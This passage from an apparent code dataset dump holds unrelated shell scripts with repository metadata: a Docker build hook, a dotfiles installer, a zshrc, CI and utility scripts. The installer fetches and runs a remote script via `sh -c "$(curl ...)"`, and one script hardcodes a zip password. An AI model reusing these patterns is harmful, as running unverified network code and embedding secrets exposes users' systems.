| awk '{print $1, $2, $3, $3 - $2}'\
| sort -k4n \
| tail -n1 \
| awk '{print $1":"$2"-"$3}')
echo "answer-5: $answer5"
## Question 6 (extra credit)
#Use one or more BEDtools that we haven't covered in class. Be creative.
#This uses bedtools reldist to find the relative distance between
#transcription factor binding sites and transcription start sites or genes
#I will make a plot of the information.
gzcat $TSS > data/TSS.bed
gzcat $TFBS \
| bedtools reldist -a - -b $TSS \
> TSS_TFBS_reldist.tsv
gzcat $GENES \
| awk '$1 == "chr22"' \
| bedtools sort -i - \
| bedtools reldist -a $TFBS -b - \
> GENES_TFBS_reldist.tsv
echo "answer-6: see R plot"
| true
|
9de5d867b38a70e7e8d05a15cdb5387afd7c1f49
|
Shell
|
makgwalem/JanTrainingMaterial
|
/variablesubsituation.sh
|
UTF-8
| 383
| 2.625
| 3
|
[] |
no_license
|
# Demo of bash parameter-expansion forms ( :- := :+ :? ).

# ${var:-word}: use word if var is unset/empty; var itself unchanged.
echo ${var:-"Variable is not set"}
echo "1 - value of var is ${var}"
# ${var:=word}: like :- but also ASSIGNS word to var.
echo ${var:="Variable is not set"}
echo "2 - value of var is ${var}"
unset var
# ${var:+word}: use word only when var IS set and non-empty — here var
# was just unset, so this prints nothing.
# NOTE(review): the literal calls :+ a "default value"; it is really an
# alternate value. The string is runtime output, left unchanged here.
echo ${var:+"This is the default value"}
echo "3 - value of var is $var"
var="Prefix"
# Now var is set, so the :+ alternate value is printed.
echo ${var:+"Thius is the default value"}
echo "3 - value of var is $var"
# ${var:?msg}: print msg to stderr and abort if var is unset/empty;
# var is "Prefix" here, so its value is printed and the script goes on.
echo ${var:?"Print this messgae"}
echo "5 - value of var is ${var}"
| true
|
def30424b2763179d96658c4d568b172931ceedf
|
Shell
|
get-it-live/system-tools
|
/builder/build.sh
|
UTF-8
| 2,581
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
#set -e
repo=$1
branch=$2
mode=$3
dockerfile=$4
taskId=$5
auth=$6
cache=$7
force=$8
# Expand content to 'deploy' repo
deployDir="/git/${repo}/${mode}"
mkdir -p ${deployDir}
cd ${deployDir}
function finish
{
echo $1 | curl -k -s -XPOST -d @- -u ${auth} -H 'Content-Type: application/json' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Done?success=false&image=${image}&commit=${remote_sha}"
echo "ERROR : $1"
exit 1
}
### Commented out because e already pull in a previous stage, from app/Build.PullRepo()
#checkout=""
#checkout="$(GIT_WORK_TREE=${deployDir} git checkout -f ${branch} || cd ${deployDir} && git checkout -f ${branch} 2>&1)"
#if [ $? -ne 0 ]
#then
# echo "Repository checkout failed, aborting build."
# finish "$checkout"
# exit 1
#fi
output=""
lastline=""
if [ "${cache}" == "False" ]; then
useCache="--no-cache"
fi
test -z "${useCache}" && echo " ***** Building new Image (using cache)..." || echo " ***** Building new Image (not using cache)..."
# Send/Publish Dockerfile
dockerfile_path="./${dockerfile}/Dockerfile"
test -f ${dockerfile_path} || finish "Could not find Dockerfile in specified path '${dockerfile_path}'"
$(curl -k -s -XPOST --data-binary @${dockerfile_path} -u ${auth} -H 'Content-Type: text/plain' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Dockerfile" 2>&1)
#build_dockerfile=$(docker -H tcp://127.0.0.1:5555 build -q ${useCache} "${dockerfile}" 2>&1)
#if [ $? -ne 0 ]
#then
# finish($build_dockerfile)
#fi
build_dockerfile=""
build_dockerfile=$(docker -H tcp://127.0.0.1:5555 build -q ${useCache} "${dockerfile}" 2>&1 | {
while IFS= read -r line
do
echo " $line"
output+="\\n${line}"
lastline="$line"
done
image="`echo ${lastline} | awk '{print $3}'`"
# Publish Dockerfile
dockerfile_path="./${dockerfile}/Dockerfile"
curl -k -s -XPOST --data-binary @${dockerfile_path} -u ${auth} -H 'Content-Type: text/plain' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Dockerfile"
sleep 5
docker -H tcp://127.0.0.1:5555 inspect ${image} || $(finish "Could not find built image '${image}'"; exit 1)
echo " ***** Publishing ${image} into your '${repo}' images repository..."
echo ${output} | curl -k -s -XPOST -d @- -u ${auth} -H 'Content-Type: application/json' -H "Token: ${APIKEY}" \
"http://www.getitlive.io/api/Hooks/Repository/${taskId}/Done?success=true&image=${image}&commit=${remote_sha}"
} 2>&1)
if [ $? -ne 0 ]
then
finish "$build_dockerfile"
fi
| true
|
c6ed4dda1945c1ab2b947d26f36b56c2ef63e1b3
|
Shell
|
sscswapnil/Linux_Scripting_My_Tutorials
|
/Simple_Mathematical_Operation/Math.sh
|
UTF-8
| 498
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/bash

# Simple interactive calculator: read two numbers and apply the chosen
# operation. Uses shell arithmetic, so division is integer division.
read -p "Enter first Number :" n1
read -p "Enter Second Number :" n2
echo ""
echo "1 --> Addition Operation"
echo "2 --> Subtraction Operation"
echo "3 --> Multiplication Operation"
echo "4 --> Division Operation"
read -p "Choose the option 1|2|3|4: " option
case $option in
1)
    echo "$n1+$n2=$((n1+n2))"
    ;;
2)
    echo "$n1-$n2=$((n1-n2))"
    ;;
3)
    echo "$n1*$n2=$((n1*n2))"
    ;;
4)
    # Fix: a zero divisor previously crashed the script with a shell
    # "division by 0" arithmetic error; report it cleanly instead.
    if [ "$n2" = "0" ]; then
        echo "Division by zero is not allowed"
    else
        echo "$n1/$n2=$((n1/n2))"
    fi
    ;;
*)
    echo "Enter 1|2|3|4 Option Only. Execute Again"
esac
| true
|
21fc911501b03700319e5231703d72c129979aaf
|
Shell
|
matthewpi/dotfiles-old
|
/setup.sh
|
UTF-8
| 4,287
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
# Print a message, honouring backslash escape sequences (e.g. \n).
# Fix: quote "$1" — unquoted it was word-split (collapsing internal
# whitespace) and glob-expanded before being echoed.
print() {
    echo -e "$1"
}
# True when the given name resolves to a runnable command (builtin,
# function, alias, or executable on PATH); all output is discarded so
# this can be used directly in conditionals.
command_exists() {
    command -v "$@" &> /dev/null
}
# Resolve the latest release tag of a GitHub repository.
# $1 - "owner/repo" slug.
# Writes the tag name (e.g. "v0.30.1") to stdout by scraping the
# "tag_name" field out of the GitHub releases API response.
# NOTE(review): the API call is unauthenticated and therefore
# rate-limited — confirm that is acceptable for this install flow.
get_latest_release() {
    curl --silent "https://api.github.com/repos/$1/releases/latest" |
        grep '"tag_name":' |
        sed -E 's/.*"([^"]+)".*/\1/'
}
# Download the starship prompt release tarball and install the binary
# into ~/.local/bin. Reads the release tag from the global $VERSION
# (set by the caller via get_latest_release).
# NOTE(review): wget saves into the current directory while the
# tar/mv/rm steps reference $HOME — this relies on the script's earlier
# `cd $HOME`; confirm before reusing this function elsewhere.
install_starship() {
    wget https://github.com/starship/starship/releases/download/${VERSION}/starship-x86_64-unknown-linux-musl.tar.gz
    tar xvzf $HOME/starship-x86_64-unknown-linux-musl.tar.gz
    mv $HOME/starship $HOME/.local/bin/starship
    # Also removes a leftover $HOME/target directory from extraction.
    rm $HOME/starship-x86_64-unknown-linux-musl.tar.gz $HOME/target -rf
}
# Root User Detection
if [ "$EUID" -ne 0 ]; then
print "This script must be ran as the root user."
exit 1
fi
# OS Detection
if [ -f /etc/os-release ]; then
. /etc/os-release
OS=$ID
else
print "Unable to detect operating system."
exit 1
fi
# Because I'm a stuck-up asshole who only supports RHEL based OSes
if [ "$OS" != "rhel" ] && [ "$OS" != "fedora" ] && [ "$OS" != "centos" ]; then
print "You must be on a RHEL based operating system to use this."
exit 1
fi
if [ "$SUDO_USER" == "root" ]; then
# Set the HOME variable to be the root directory
HOME="/root"
else
# Make the HOME variable use the proper user directory
HOME="/home/$SUDO_USER"
# Because if you don't run it using sudo $SUDO_USER is empty.
if [ "$HOME" == "/home/" ]; then
echo "You must run this script using \`sudo\` even as the root user."
exit 1
fi
fi
# Switch to the user's home directory
cd $HOME
# Update any packages
yum update -y
# Install Curl
rpm -q "curl" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing curl"
yum install curl -y > /dev/null
fi
# Install wget
rpm -q "wget" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing wget"
yum install wget -y > /dev/null
fi
# Install Git
rpm -q "git" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing git"
yum install git -y > /dev/null
fi
# Install ZSH
rpm -q "zsh" &> /dev/null
if [ $? -ne 0 ]; then
print "Installing zsh"
yum install zsh -y > /dev/null
fi
# Get the latest starship version
VERSION=`get_latest_release "starship/starship"`
# Check if starship is already installed
if [ -f "$HOME/.local/bin/starship" ]; then
print "Starship is already installed, checking if an update is available.."
LATEST_VERSION="starship ${VERSION:1}"
CURRENT_VERSION=`starship -V`
# Check if starship is outdated
if [ "$LATEST_VERSION" != "$CURRENT_VERSION" ]; then
print "Updating ${CURRENT_VERSION} to ${LATEST_VERSION}"
rm $HOME/.local/bin/starship -rf
install_starship
else
print "Starship is up to date"
fi
else
print "Installing starship.."
mkdir -p $HOME/.local/bin || true
install_starship
fi
# Install oh-my-zsh
if [ ! -d "$HOME/.oh-my-zsh" ]; then
print "Installing oh-my-zsh"
sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" "" --unattended
fi
# Install zsh-autosuggestions
if [ ! -d "$HOME/.oh-my-zsh/custom/plugins/zsh-autosuggestions" ]; then
git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions
fi
# Install zsh-syntax-highlighting
if [ ! -d "$HOME/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting" ]; then
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting
fi
# Add .bashrc
rm $HOME/.bashrc || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.bashrc --silent --output $HOME/.bashrc
# Add .hushlogin
if [ ! -f "$HOME/.hushlogin" ]; then
touch $HOME/.hushlogin || true
fi
# Add .zshrc
rm $HOME/.zshrc || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.zshrc --silent --output $HOME/.zshrc
# Add starship.toml
mkdir $HOME/.config || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.config/starship.toml --silent --output $HOME/.config/starship.toml
# Add .tmux.conf
rm $HOME/.tmux.conf || true
curl https://raw.githubusercontent.com/matthewpi/dotfiles/master/.tmux.conf --silent --output $HOME/.tmux.conf
# Set ZSH as the user's default shell
usermod --shell $(which zsh) $SUDO_USER
| true
|
6db0c06db3d24f641c84560f1a76269f9edfeb8c
|
Shell
|
zennro/dotfiles-11
|
/zshrc
|
UTF-8
| 2,884
| 3.015625
| 3
|
[] |
no_license
|
ZSH="$HOME/.oh-my-zsh"
ZSH_THEME="agnoster"
COMPLETION_WAITING_DOTS="true"
DEFAULT_USER="dan"
plugins=(vi-mode git git-extras zsh-syntax-highlighting)
source $ZSH/oh-my-zsh.sh
[[ -f $HOME/.bash_aliases ]] && source $HOME/.bash_aliases
if command -v fzf &> /dev/null; then
unalias historygrep
function historygrep {
print -z $(fc -nl 1 | grep -v 'history' | fzf +s -e -q "$*")
}
function fzcmd {
print -z $(printf -rl $commands:t ${(k)functions} ${(k)aliases} | sort | uniq | fzf -e -q "$*")
}
fi
unfunction cd
chpwd() {
emulate -L zsh
ls
}
autoload -U zmv
alias zcp='noglob zmv -C '
alias zln='noglob zmv -L '
alias zmv='noglob zmv '
alias -g L='| less'
alias -g S='| sort'
alias -g SU='| sort | uniq | sort'
alias -g SUC='| sort | uniq -c | sort -n'
alias -g V='| vim -'
alias -g DN='&> /dev/null'
bindkey -v
bindkey '^[[A' history-search-backward
bindkey '^[[B' history-search-forward
bindkey '^[[5~' up-line-or-history
bindkey '^[[6~' down-line-or-history
bindkey '^[[7~' beginning-of-line
bindkey '^[[8~' end-of-line
bindkey '^[[1~' beginning-of-line
bindkey '^[[4~' end-of-line
zle -N fancy-ctrl-z
zle -N delete-in
zle -N change-in
zle -N delete-around
zle -N change-around
bindkey '^Z' fancy-ctrl-z
bindkey -M vicmd 'ca' change-around
bindkey -M vicmd 'ci' change-in
bindkey -M vicmd 'cc' vi-change-whole-line
bindkey -M vicmd 'da' delete-around
bindkey -M vicmd 'di' delete-in
bindkey -M vicmd 'dd' kill-whole-line
# ZLE widget (bound to ^Z above): with an empty command line, resume
# the current background job (`bg`) and redraw the prompt; otherwise
# stash the typed input via push-input — presumably so it reappears at
# the next prompt; confirm against zsh zle docs.
fancy-ctrl-z() {
  if [[ "$#BUFFER" == 0 ]]; then
    bg
    zle redisplay
  else
    zle push-input
  fi
}
delete-in() {
local CHAR LCHAR RCHAR LSEARCH RSEARCH COUNT
read -k CHAR
if [[ "$CHAR" == 'w' ]]; then
zle vi-backward-word
LSEARCH=$CURSOR
zle vi-forward-word
RSEARCH=$CURSOR
RBUFFER="$BUFFER[$RSEARCH + 1, ${#BUFFER}]"
LBUFFER="$LBUFFER[1, $LSEARCH]"
return
elif [[ "$CHAR" == '(' ]] || [[ "$CHAR" == ')' ]] || [[ "$CHAR" == 'b' ]]; then
LCHAR="("
RCHAR=")"
elif [[ "$CHAR" == '[' ]] || [[ "$CHAR" == ']' ]]; then
LCHAR="["
RCHAR="]"
elif [[ $CHAR == '{' ]] || [[ $CHAR == '}' ]] || [[ "$CHAR" == 'B' ]]; then
LCHAR='{'
RCHAR='}'
else
LCHAR="$CHAR"
RCHAR="$CHAR"
fi
LSEARCH=${#LBUFFER}
while (( $LSEARCH > 0 )) && [[ "$LBUFFER[$LSEARCH]" != "$LCHAR" ]]; do
LSEARCH=$(expr $LSEARCH - 1)
done
if [[ "$LBUFFER[$LSEARCH]" != "$LCHAR" ]]; then
return
fi
RSEARCH=0
while [[ "$RSEARCH" < $(expr ${#RBUFFER} + 1 ) ]] && [[ "$RBUFFER[$RSEARCH]" != "$RCHAR" ]]; do
RSEARCH=$(expr $RSEARCH + 1)
done
if [[ "$RBUFFER[$RSEARCH]" != "$RCHAR" ]]; then
return
fi
RBUFFER="$RBUFFER[$RSEARCH, ${#RBUFFER}]"
LBUFFER="$LBUFFER[1, $LSEARCH]"
}
change-in() {
zle delete-in
zle vi-insert
}
delete-around() {
zle delete-in
zle vi-backward-char
zle vi-delete-char
zle vi-delete-char
}
change-around() {
zle delete-in
zle vi-backward-char
zle vi-delete-char
zle vi-delete-char
zle vi-insert
}
| true
|
8c333cb7d4fce0badf290e73aab30e25b83a0888
|
Shell
|
grails-plugins/grails-spring-security-oauth2-google
|
/travis-build.sh
|
UTF-8
| 516
| 3.09375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -e

# Travis CI build script: always build and test; publish artifacts only
# for tagged builds or non-PR builds of master.
rm -rf build
./gradlew -q clean check install --stacktrace

EXIT_STATUS=0
echo "branch: $TRAVIS_BRANCH"
echo "pull-request: $TRAVIS_PULL_REQUEST"
echo "travis tag: $TRAVIS_TAG"

if [[ -n $TRAVIS_TAG ]] || [[ $TRAVIS_BRANCH == 'master' && $TRAVIS_PULL_REQUEST == 'false' ]]; then
    echo "Publishing archives ... "
    # Tagged releases go to Bintray; master snapshots use `publish`.
    # `|| EXIT_STATUS=$?` records the failure without tripping set -e.
    if [[ -n $TRAVIS_TAG ]]; then
        ./gradlew bintrayUpload || EXIT_STATUS=$?
    else
        ./gradlew publish || EXIT_STATUS=$?
    fi
    # ./publish-docs.sh
fi

# Fix: EXIT_STATUS was captured above but never propagated, so a failed
# publish still reported the build as green. Exit with it explicitly.
exit $EXIT_STATUS
| true
|
038f872786a0f6202591f091549b182cf9caa8c8
|
Shell
|
seanbreckenridge/dotfiles
|
/.local/scripts/generic/macho
|
UTF-8
| 875
| 3.703125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Converted into bash from:
# https://hiphish.github.io/blog/2020/05/31/macho-man-command-on-steroids/
declare -rx FZF_DEFAULT_OPTS='
--height=30%
--layout=reverse
--prompt="Manual: "
--preview="man -Pcat {S} {1} 2>/dev/null"'
while getopts ":s:" opt; do
case $opt in
s)
SECTION="$OPTARG"
shift
shift
;;
\?)
echo "Invalid option: -${OPTARG}" >&2
exit 1
;;
:)
echo "Option -${OPTARG} requires an argument" >&2
exit 1
;;
esac
done
declare -a APROPROS_ARGS
APROPROS_ARGS=()
# if user wanted a particular section, use that
[[ -n "$SECTION" ]] && APROPROS_ARGS+=(-s "$SECTION")
# use what the user passed, else . (everything)
APROPROS_ARGS+=("${@:-.}")
declare manual
manual="$(apropos "${APROPROS_ARGS[@]}" |
grep -v -E '^.+ \(0\)' |
awk '{print $1}' |
sort |
fzf)" || exit $?
man "$manual"
printf '\r' # fix cursor location
| true
|
4434a65ff36a37ac0f544d1b86e2deb50862fa86
|
Shell
|
structbinary/AWSome
|
/monitor.sh
|
UTF-8
| 305
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
# Snapshot basic system statistics (memory, disk, vmstat, sockets,
# processes) into a timestamped folder under /home/ubuntu/logs, archive
# it as a password-protected zip, and delete the raw folder.
foldername=$(date +%Y-%m-%d-%H:%M:%S)
mkdir /home/ubuntu/logs/$foldername
cd /home/ubuntu/logs/
cd $foldername
# One log file per tool inside the snapshot folder.
free >> free.log
df >> df.log
vmstat >> vmstat.log
netstat >> netstat.log
ps >> ps.log
cd ..
# NOTE(review): the zip password is hardcoded in the script and is
# visible in the process list while zip runs — obfuscation, not
# security.
zip -r --password accenturehack $foldername.zip $foldername
# NOTE(review): if either `cd` above failed, this rm runs relative to
# the wrong directory — consider `cd ... || exit`.
rm -rf $foldername
| true
|
c37b5aa8d3e232160423f0168fa59ffc655bdbbc
|
Shell
|
bilsaboob/nemerle
|
/tools/cs2n/convert
|
UTF-8
| 319
| 3.546875
| 4
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
DIR=`dirname $0`
ENGINE=`grep "^NET_ENGINE" ./$DIR/../../config.mak | awk '{print $3}'`
directory=
if [ "$#" -gt "0" ]; then
directory=$1
else
directory=tests
fi
for i in $directory/*.cs; do
echo "-----------$i-----------------";
$ENGINE ./cs2n.exe $i -out:`echo $i | sed 's/\.cs/\.n/g'`;
done;
| true
|
f014b73c911f8308deb6e1ce501355c641423fdf
|
Shell
|
jackbaty/ping-addresses
|
/ping-addresses.sh
|
UTF-8
| 227
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/sh
# Read host addresses from the first column of the file given as $1 and
# report whether each answers a single ping.
# Stolen from Stackexchange. Don't remember the author, sorry.
#
# Fixes: quote "$1" (an unquoted redirection target breaks on paths
# with whitespace), use `read -r` so backslashes in the input are not
# mangled, and quote "$ip" everywhere it is expanded.
awk '{print $1}' < "$1" | while read -r ip; do
    if ping -c1 "$ip" >/dev/null 2>&1; then
        echo "$ip IS UP"
    else
        echo "$ip IS DOWN"
    fi
done
| true
|
4f5e2831d92158f6327f2661dc6db3196db87647
|
Shell
|
yukinko-tea-room/milli-uni
|
/script/build-data.sh
|
UTF-8
| 402
| 2.515625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
SPREADSHEET_URL="https://docs.google.com/spreadsheets/d/1SuvJFStzTXDalw3PXHk8Cph3ewrHvYwDlKWWIRnSzfU/export"
UNIT_TO_IDOL_SHEET_ID="1100874764"
IDOL_TO_UNIT_SHEET_ID="1217692686"
wget -O unitToIdol.csv "${SPREADSHEET_URL}?format=csv&gid=${UNIT_TO_IDOL_SHEET_ID}"
wget -O idolToUnit.csv "${SPREADSHEET_URL}?format=csv&gid=${IDOL_TO_UNIT_SHEET_ID}"
./csvToJson.py
cp *.json ../src
| true
|
beb5a88f5b7e251cdbd0d3faaf753804871dd0dd
|
Shell
|
vassilikitsios/local_linear_stability_cpp
|
/tests/turbulent_channel/5stability_nonlinear_eddy/local_linear_stability.run
|
UTF-8
| 999
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# ----------------------------------------------------------------------------
# Some important filenames:
PROGRAM="local_linear_stability"
OUTPUT_FILE=${PROGRAM}".out"
ERROR_FILE=${PROGRAM}".err"
PROGRAM_BIN_DIR="/home/kit027/local_linear_stability_code/drivers/local_linear_stability/bin"
RESULTS_DIR="./results"
# ----------------------------------------------------------------------------
# Organise files:
rm -vrf $PROGRAM $OUTPUT_FILE $ERROR_FILE *~
mkdir $RESULTS_DIR
cp $PROGRAM_BIN_DIR/$PROGRAM .
# ----------------------------------------------------------------------------
# Running code:
echo "Running "$PROGRAM" code ..."
./$PROGRAM
#$PROGRAM 1>${PROGRAM}.out 2> ${PROGRAM}.err
# ----------------------------------------------------------------------------
# Generate images:
echo "Generating images..."
cd images
gnuplot plot_results.gp
ps2pdf results.eps
cd ..
echo "done."
echo " "
# ----------------------------------------------------------------------------
| true
|
b1ce9dc456e03507767e53dc6bab5d1fdfeb5b55
|
Shell
|
songyinghao/ionic-boilerplate
|
/env/scripts/upload-ios-hockeyapp.sh
|
UTF-8
| 891
| 3.0625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
### ===================
# Upload app package to HockeyApp.
#
### ===================
if [ -z "$HOCKEY_APP_ID" -a -z "$HOCKEY_APP_TOKEN" ]; then
echo "Error: Missing HockeyApp App ID and App Token."
exit 1
fi
echo "iOS_BUILD = $iOS_BUILD"
if [ "$BUILD_APP" != true -o "$iOS_BUILD" != true ]; then
echo "Info: Can only run for iOS build. Skip~~~"
exit 0
fi
OUTPUTDIR="$PWD/platforms/ios/build/device/"
curl https://rink.hockeyapp.net/api/2/apps/$HOCKEY_APP_ID/app_versions/upload \
-F status="2" \
-F notify="0" \
-F notes="$RELEASE_NOTES" \
-F notes_type="0" \
-F ipa="@$OUTPUTDIR/$APP_NAME.ipa" \
-F dsym="@$OUTPUTDIR/$APP_NAME.dsym.zip" \
-F commit_sha="$TRAVIS_COMMIT" \
-H "X-HockeyAppToken: $HOCKEY_APP_TOKEN"
if [[ $? -ne 0 ]]; then
echo "Error: Failed to upload app package to HockeyApp"
exit 1
fi
| true
|
1bc8bb32061cc716ce436b344510efd25ab935e5
|
Shell
|
daktronics/debian-nginx
|
/debian/modules/http-uploadprogress/test/stress.sh
|
UTF-8
| 879
| 2.796875
| 3
|
[
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"BSD-4-Clause"
] |
permissive
|
#!/bin/sh
# Usage: stress.sh UPLOAD_URL PROGRESS_URL
#
# Endlessly fire batches of 30 concurrent rate-limited uploads at
# UPLOAD_URL while a companion client polls PROGRESS_URL for each
# upload's X-Progress-ID. Stop with Ctrl-C.

i=0
LIMIT="10k"
FILE="100"

#trap 'kill_all' SIGINT SIGTERM

while :
do
	# The original repeated the upload/poll pair six times inside a
	# `seq 5` loop (30 uploads per batch); a single `seq 30` loop is
	# equivalent and removes the duplication. `while :` replaces
	# `[ "1" == "1" ]`, whose `==` is not portable under /bin/sh.
	for j in $(seq 30)
	do
		i=`expr $i + 1`
		echo "Upload $i"
		curl --limit-rate $LIMIT -F pouet=@$FILE $1?X-Progress-ID=$i &
		sh client.sh $i $2 &
	done
	# Let the whole batch finish before starting the next one.
	wait
done
| true
|
76032a3816ee7b3b4a1034a8161d9a0f82281bf4
|
Shell
|
qingqibing/go-3dobj
|
/build.sh
|
UTF-8
| 581
| 2.625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build/lint/test driver for the go-3dobj package and its ./example program.
me=$(basename "$0")
# msg MESSAGE... -- print a diagnostic to stderr prefixed with this script's name.
# NOTE(review): currently unused by the script body; kept as a helper.
msg() {
echo >&2 "$me:" "$@"
}
# Format and auto-fix sources, then vet and install the package.
gofmt -s -w ./*.go ./example
go tool fix ./*.go ./example
go vet . ./example
go install
# Optional linters: run only if installed ('hash' probes the PATH quietly).
#hash gosimple 2>/dev/null && gosimple ./*.go
hash golint 2>/dev/null && golint ./*.go
#hash staticcheck 2>/dev/null && staticcheck ./*.go
#hash gosimple 2>/dev/null && gosimple ./example/*.go
hash golint 2>/dev/null && golint ./example/*.go
#hash staticcheck 2>/dev/null && staticcheck ./example/*.go
# Unit tests and benchmarks.
go test
go test -bench=.
go mod tidy ;# remove non-required modules from dependencies
| true
|
ed47ee4231840aeddfdc95d525a826e23e987c99
|
Shell
|
cu-swe4s-fall-2019/trees-qyang13
|
/rand_word_generator.sh
|
UTF-8
| 463
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# Generate two CSV lists (index,word) of NUMWORDS random dictionary words
# each: non_rand.txt and rand.txt (the names describe how the key column
# is used downstream; both files are produced the same way here).
#
# Fixes over the original: the identical generation loop was duplicated
# for each output file and the dictionary line count was computed twice;
# both are now factored into one function and one count.
# NOTE: output is appended (>>) as in the original, so rerunning grows
# the files.
WORDFILE="/usr/share/dict/words"
NUMWORDS=10000

# Count non-empty dictionary lines once; both files draw from the same pool.
tL=$(awk 'NF!=0 {++c} END {print c}' "$WORDFILE")

# gen_list OUTFILE -- append NUMWORDS "i,random-word" lines to OUTFILE.
gen_list() {
	for i in $(seq $NUMWORDS)
	do
		rnum=$((RANDOM % tL + 1))
		echo $i,$(sed -n "$rnum p" $WORDFILE) >> "$1"
	done
}

gen_list non_rand.txt
gen_list rand.txt
| true
|
439f3349c42bde16878d92aa8835dea0c121c18d
|
Shell
|
giacomoalbe/config
|
/.bash_aliases
|
UTF-8
| 1,513
| 2.953125
| 3
|
[] |
no_license
|
#################
# ALIAS SECTION #
#################
# docker / docker-compose shortcuts
alias dc=docker-compose
alias dcp="docker-compose -f docker-compose.prod.yml"
alias dl="docker-compose logs -f"
# one-letter shortcuts for everyday tools
alias g=git
alias d=docker
alias t=tmux
alias vim=nvim
alias c=clear
# edit / reload shell configuration
alias ev="vim ~/.bashrc"
alias sv="source ~/.bashrc"
alias ea="vim ~/.bash_aliases"
# tmux session management (new / attach / kill / list)
alias tn="tmux new -s"
alias ta="tmux attach -t"
alias tk="tmux kill-session -t"
alias tl="tmux ls"
# ls variants
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# misc: pacman install, vala lint, open with default app, keyboard remap
alias pi="sudo pacman -S "
alias vl="io.elementary.vala-lint ."
alias open="xdg-open"
alias reloadkc="xmodmap ~/.Xmodmap"
# dotfiles managed as a bare git repo in ~/.myconf
alias config='/usr/bin/git --git-dir=$HOME/.myconf/ --work-tree=$HOME'
# cd that lists the directory after changing into it
cd() { builtin cd "$@" && ls -lG ; }
alias ls="ls -h"
# git shortcuts and pretty log formats
alias gs="git status"
alias ga="git add"
alias gc="git commit -m"
alias gl="git log --pretty=format:'%ad [%an] | %s' --date=format:'%d/%m/%y %H:%M'"
alias glh="git --no-pager log --pretty=tformat:'%ad %C(Yellow)%h%C(reset) %C(blue)[%an]%C(reset) | %s' --date=format:'%d/%m/%y %H:%M' -10"
alias glt="git log --pretty=format:'%h %ad | %s [%an]' --author=Giacomo --date=format:\"%d/%m/%y %H:%M\" --since=\$(date +%Y-%m-%d) | tee"
# Portusage
alias portusage="sudo netstat -tulpn"
# HLedger
alias hl="hledger"
# Add an "alert" alias for long running commands. Use like so:
# sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# rebuild font cache
alias rfc="fc-cache -f -v"
| true
|
264777ef948e5c492698417803a1cab589331812
|
Shell
|
toborguru/beagleboard_navstack
|
/beagle_board/scripts/bb_backup_system_files
|
UTF-8
| 888
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# Script written to monitor and control the DATA robot by Sawyer Larkin
# Copies hand-edited system configuration files into the repository's
# system_files tree for backup. Only option is -h (help).
NAME=`basename $0`
# display_usage -- print help to stderr and exit non-zero.
display_usage ()
{
echo "Usage: $NAME [options]" 1>&2
echo "" 1>&2
echo "Copies relevant system files that I have updated into this repository for backup." 1>&2
echo "" 1>&2
echo " -h Print this message" 1>&2
exit 1
}
# Leading-colon-free "h" spec: getopts reports unknown options as '?'.
while getopts "h" opt
do
case ${opt} in
h )
display_usage
;;
\? )
echo "Invalid option: $OPTARG" 1>&2
display_usage
;;
: )
echo "Invalid option: $OPTARG requires an argument" 1>&2
display_usage
;;
esac
done
shift $((OPTIND -1))
# Copy live system files into the repo backup tree.
cp /etc/wpa_supplicant.conf ~/beagleboard_navstack/beagle_board/system_files/etc/
# NOTE(review): destination says "connnman" (three n's) while the source
# is /etc/connman -- looks like a typo; verify against the repo layout.
cp /etc/connman/main.conf ~/beagleboard_navstack/beagle_board/system_files/etc/connnman/
cp /etc/network/interfaces ~/beagleboard_navstack/beagle_board/system_files/etc/network/
| true
|
c471764fc6ee7c4e816f8bc9a2190558e12cc48a
|
Shell
|
jagadeesh800/local-repo
|
/scripts/s1.sh
|
UTF-8
| 121
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Ask the user for y/n and report whether a valid answer was entered.
#
# Fixes over the original:
#  - '-ne' is an integer comparison and errors on strings; string
#    equality in test is '='.
#  - 'x != y -o x != n' is always true; the intended check is
#    "x equals y or n".
#  - the empty 'else' branch ('else' immediately before 'fi') was a
#    bash syntax error.
read -p 'enter y or n : ' x
if [ "$x" = "y" ] || [ "$x" = "n" ]
then
	echo "entered y or n"
else
	echo "invalid input"
fi
| true
|
852114b06ce4bfcb7ae23637b17e75966f2d45e2
|
Shell
|
AksV73/Os_lab_sem4
|
/lab3/qu3.sh
|
UTF-8
| 362
| 3.4375
| 3
|
[] |
no_license
|
# Prompt for student details, then bubble-sort the positional parameters
